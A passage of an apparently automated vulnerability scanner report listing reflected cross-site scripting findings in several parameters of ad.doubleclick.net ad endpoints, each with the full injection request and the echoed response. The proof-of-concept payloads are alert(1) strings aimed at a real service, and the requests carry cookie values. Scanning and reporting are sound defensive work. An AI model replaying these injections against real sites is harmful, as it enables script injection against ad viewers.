var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=7048581277a80e"-alert(1)-"f1d880c1fb0&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/w%3B232789996%3B1-0%3B0%3B56669790%3B3454-728/90%3B35405287/35423105/2%3B%3B%7Esscs%
...[SNIP]...

5.24. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5047.MSN/B3795397.61

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2378f"-alert(1)-"aca77ed0aea was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb2378f"-alert(1)-"aca77ed0aea&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:42:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8149

document.write('<!-- Template Id = 11,448 Template Name = Coremetrics Impression Template - FLASH -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/87
...[SNIP]...
0" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb2378f"-alert(1)-"aca77ed0aea&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/r%3B232789996%3B4-0%3B0%3B56669790%3B3454-728/90%3B39235519/39253306/1%3B%3B%7Esscs%3D%3fhttp://aptm.phoenix.edu/?creative_desc=20dr
...[SNIP]...

5.25. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5047.MSN/B3795397.61

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af92a"-alert(1)-"cc3235c4e7d was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9ACaf92a"-alert(1)-"cc3235c4e7d&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8177

document.write('<!-- Template Id = 11,448 Template Name = Coremetrics Impression Template - FLASH -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/87
...[SNIP]...
= 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9ACaf92a"-alert(1)-"cc3235c4e7d&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/b%3B232789996%3B0-0%3B0%3B56669790%3B3454-728/90%3B34684340/34702218/2%3B%3B%7Esscs%3D%3fhttp:
...[SNIP]...

5.26. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5047.MSN/B3795397.61

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 225ef"-alert(1)-"0238af59b08 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353225ef"-alert(1)-"0238af59b08&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8197

document.write('<!-- Template Id = 11,448 Template Name = Coremetrics Impression Template - FLASH -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/87
...[SNIP]...
_728x90.gif";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353225ef"-alert(1)-"0238af59b08&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/w%3B232789996%3B1-0%3B0%3B56669790%3B3454-728/90%3B35405287/35423105/2%
...[SNIP]...

5.27. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5047.MSN/B3795397.61

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7913a"-alert(1)-"5a80d9941ef was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G7913a"-alert(1)-"5a80d9941ef&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8139

document.write('<!-- Template Id = 11,448 Template Name = Coremetrics Impression Template - FLASH -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/87
...[SNIP]...
20DR_Button_Orange_728x90.gif";
var minV = 9;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G7913a"-alert(1)-"5a80d9941ef&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/c%3B232789996%3B3-0%3B0%3B56669790%3B3454-728/90%3B38
...[SNIP]...

5.28. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5047.MSN/B3795397.61

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1989"-alert(1)-"427b3fe4f34 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=d1989"-alert(1)-"427b3fe4f34 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 8139
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:42:30 GMT
Expires: Tue, 26 Apr 2011 18:42:30 GMT

document.write('<!-- Template Id = 11,448 Template Name = Coremetrics Impression Template - FLASH -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/87
...[SNIP]...
= escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=d1989"-alert(1)-"427b3fe4f34http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/c%3B232789996%3B3-0%3B0%3B56669790%3B3454-728/90%3B38954353/38972110/2%3B%3B%7Esscs%3D%3fhttp://www.aptm.phoenix.edu/?creative_desc=20DR_Button_O
...[SNIP]...

5.29. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5047.MSN/B3795397.61

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5286c"-alert(1)-"52e38c0e3f5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!5286c"-alert(1)-"52e38c0e3f5&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:40:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8139

document.write('<!-- Template Id = 11,448 Template Name = Coremetrics Impression Template - FLASH -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/87
...[SNIP]...
0.2mdn.net/1676624/20DR_Button_Orange_728x90.gif";
var minV = 9;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!5286c"-alert(1)-"52e38c0e3f5&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/c%3B232789996%3B3-0%3B0%3B56669790
...[SNIP]...

5.30. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91be2"-alert(1)-"08c3a9c4724 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=817380091be2"-alert(1)-"08c3a9c4724&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:40:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37138

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=817380091be2"-alert(1)-"08c3a9c4724&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/b%3B236470471%3B0-0%3B0%3B60113228%3B4986-300/
...[SNIP]...

5.31. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80c70"-alert(1)-"093128206cf was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=192992137780c70"-alert(1)-"093128206cf&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37138

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=192992137780c70"-alert(1)-"093128206cf&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/b%3B236470471%3B0-0%3B0%3B60113228%3B4986-300/600%3B41668203/41685990/1%3B%3B%7Esscs
...[SNIP]...

5.32. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62386"-alert(1)-"8c43c31d0 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f492162386"-alert(1)-"8c43c31d0&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37132

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
s.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f492162386"-alert(1)-"8c43c31d0&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/db/%2a/b%3B236470471%3B0-0%3B0%3B60113228%3B4986-300/600%3B41668203/41685990/1%3B%3B%7Esscs%3D%3f";
this.clickN = "0";

...[SNIP]...

5.33. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92029"-alert(1)-"8fa74e1bff2 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB92029"-alert(1)-"8fa74e1bff2&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37138

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
ude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB92029"-alert(1)-"8fa74e1bff2&ASID=d4a508a476044cf197a9d19e016f4921&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/b%3B236470471%3B0-0%3B0%3B60113228%3B4986-300/600%3B41668203/41685990/1%3B%3B%7Esscs%3D%3f";

...[SNIP]...

5.34. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2466"-alert(1)-"9855290f93a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838c2466"-alert(1)-"9855290f93a&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37138

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
(('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838c2466"-alert(1)-"9855290f93a&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/b%3B236470471%3B0-0%3B0%3B60113228%3B4986-300/600%3B41668203/41685990/
...[SNIP]...

5.35. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a37e5"-alert(1)-"e3e4812a691 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=Ga37e5"-alert(1)-"e3e4812a691&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:40:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37138

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
+ (('' != "") ? ('&longitude=' + '') : "");
